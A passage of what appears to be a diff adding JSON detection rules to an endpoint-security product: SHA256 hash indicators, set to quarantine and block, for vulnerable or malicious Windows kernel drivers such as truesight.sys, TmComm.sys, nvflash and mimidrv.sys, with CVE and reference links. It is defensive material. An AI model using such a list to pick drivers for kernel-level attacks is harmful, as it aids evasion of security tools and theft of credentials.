"b1ad2ae4-408d-5761-ada2-3058f26d6737", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823719Z", + "creation_date": "2026-03-23T11:45:30.823721Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823727Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "de3c01dda0a23c1d12823848e9d79bc5b3fbc349e840dce7659d06bd898ada65", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1b20f2a-8649-5dda-88ad-ab239298af43", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153989Z", + "creation_date": "2026-03-23T11:45:31.153991Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.153996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d3a8e0bd46ef4bf0787a0a4719908d7ac5cae5cafb313dc3b304be18e13b9369", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1b7dc49-0701-51cd-9cce-2cff73228f8a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455220Z", + "creation_date": "2026-03-23T11:45:30.455223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455231Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f1772bdf7dd81cb00d30159d19d4eb9160b54d7609b36f781d08ca3afbd29a7", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1c6d3f0-1e3b-52b8-a923-8876feea9882", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495456Z", + "creation_date": "2026-03-23T11:45:31.495458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495463Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d4fdd1092fd1a642f2c23b49e7c42c7c0a5c28849e28ecb58b0242fbf76e8b7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1cfffdf-163d-5c8f-ac3c-8702d84413a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604224Z", + "creation_date": "2026-03-23T11:45:29.604226Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604232Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "55f736e288a101c08b7245ccafe158f5a2e6f0a581f49a87d24e5cbbde8961e1", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1d5e065-6e1b-5e01-accb-967041eee440", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472693Z", + "creation_date": "2026-03-23T11:45:31.472697Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472704Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c880d0eacf7a11fb922b63b7f23e2ad484caba4dc566c2b050470a2880cc1929", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1e47a45-311c-5f58-8a33-97df3c6a36cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830150Z", + "creation_date": "2026-03-23T11:45:30.830152Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7b745f6fe075341d69120cb3f54e214d77160c0b344427356487b46a23bf756c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b1f44c28-9df3-5df7-b26b-67c0ee3bb43d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973688Z", + "creation_date": "2026-03-23T11:45:29.973690Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973695Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "61befeef14783eb0fed679fca179d2f5c33eb2dcbd40980669ca2ebeb3bf11cf", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] 
[https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b207f879-cc4c-559f-bda8-90faf46eb9ad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146813Z", + "creation_date": "2026-03-23T11:45:31.146815Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146820Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "70c13945095582777449d210c2c7ddd5b95496c0456332c933ad79b5549b0eb1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b20f89a6-74f6-58df-bca5-8e5d0cf1781f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461640Z", + "creation_date": 
"2026-03-23T11:45:30.461643Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461652Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7433f14b40c674c5e87b6210c330d5bcaf2f6f52d632ae29e9b7cf3ca405665b", + "comment": "Malicious Kernel Driver (aka mlgbbiicaihflrnh.sys) [https://www.loldrivers.io/drivers/b074dcb5-b278-4434-bdd9-14a055d724f3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b215d0d9-7b14-5bc7-9cfe-0c6ed7984ab8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817736Z", + "creation_date": "2026-03-23T11:45:31.817739Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817747Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87c3de1b890663f6f8b41cae967520501a9f3fca34a7d2c8014aec819e7bffba", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b218ae30-b391-5b2d-9de3-939a276831e5", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618966Z", + "creation_date": "2026-03-23T11:45:29.618968Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618973Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11e3d9aa67ef620a452458f67e101aa513c7fbcca8f35e2e5d0e3403d9dee937", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b219d6ac-1366-54f2-a234-66bf9bb28e49", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.471804Z", + "creation_date": "2026-03-23T11:45:31.471808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.471817Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c837d13c26b679c5fcbcdc2b40c3179310c81aa671bf1eafd3d800b3f0323f0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b22425ae-fc86-5a5d-9cad-3b9606a36f11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474291Z", + "creation_date": "2026-03-23T11:45:31.474295Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474305Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ec06754fb3bb2f8ac49a097eba70483640b5c2cc5a7136837fa66bec9e884ca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b22da231-d8eb-5198-8ef7-9b6dc403ad11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829734Z", + "creation_date": "2026-03-23T11:45:31.829737Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "235e378dd2ade7be420c6530d55efe088efc17c42dd936045dc9849785aa6f50", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2337d25-1a28-5e52-9141-1f6b5d3eb660", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984923Z", + "creation_date": "2026-03-23T11:45:29.984925Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984930Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "57e9de67e908186b3cb8180caa2e5c5d7b6bb31969557b8bd5710d79089e8868", + "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b237b64c-e1c3-5bcd-a19f-d424c4435d34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618824Z", + "creation_date": "2026-03-23T11:45:29.618826Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618831Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6694435663bf283a3d5f20e9c90cf1bc4d3687e381b32e1a004a9d24471eb95b", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b23df79f-d77e-560d-a40e-eb11cddf10a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473642Z", + "creation_date": "2026-03-23T11:45:31.473646Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473656Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1429bbab0bd067235d06f5857f6976e42587863acd17ca022ab15e97ded5b4fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b263ba80-da2d-5f98-924a-21c9eaf93681", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150391Z", + "creation_date": "2026-03-23T11:45:31.150393Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150398Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"cae63e4da0609c13fb1cfa859e5afedd5a8722ffbc764bf47eb276471a928050", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b271a294-a4f8-5b4d-b59d-cea2f3752cff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613083Z", + "creation_date": "2026-03-23T11:45:29.613085Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613090Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f23313adb35782adb0ba97fefbfbb8bbc5fc40ae272e07f6d4629a5305a3fa2", + "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b27440a5-a394-5ee0-b335-f973eccacb39", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973705Z", + "creation_date": "2026-03-23T11:45:29.973707Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973712Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62f5e13b2edc00128716cb93e6a9eddffea67ce83d2bb426f18f5be08ead89e0", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2751049-4219-502c-97be-c6bbc81ccb35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479704Z", + "creation_date": "2026-03-23T11:45:30.479706Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3482f671cb1b6414e43ab2c9bccc94c1fba67ceac6e9831249f18f31ad68880c", + "comment": "Vulnerable Kernel Driver (aka amifldrv64.sys) 
[https://www.loldrivers.io/drivers/a5eb98bf-2133-46e8-848f-a299ea0ddefa/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b27da2ce-4743-51c9-95b2-c5335c5fc040", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467765Z", + "creation_date": "2026-03-23T11:45:30.467768Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16b6a65d569ad3d0a1ff5aaf2374c28cebab4a289ffee42b79f7a48d5979b579", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b2891fc8-0b2d-56e1-b347-db736451c2c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476339Z", + "creation_date": "2026-03-23T11:45:31.476343Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476353Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9c26b3727af0f6ef4ac8cc8648cb4ecc4ad77b02cb0677fcc493b18ca19cdd2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b293d4b8-7b1e-507a-92cf-4143d31fdd16", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 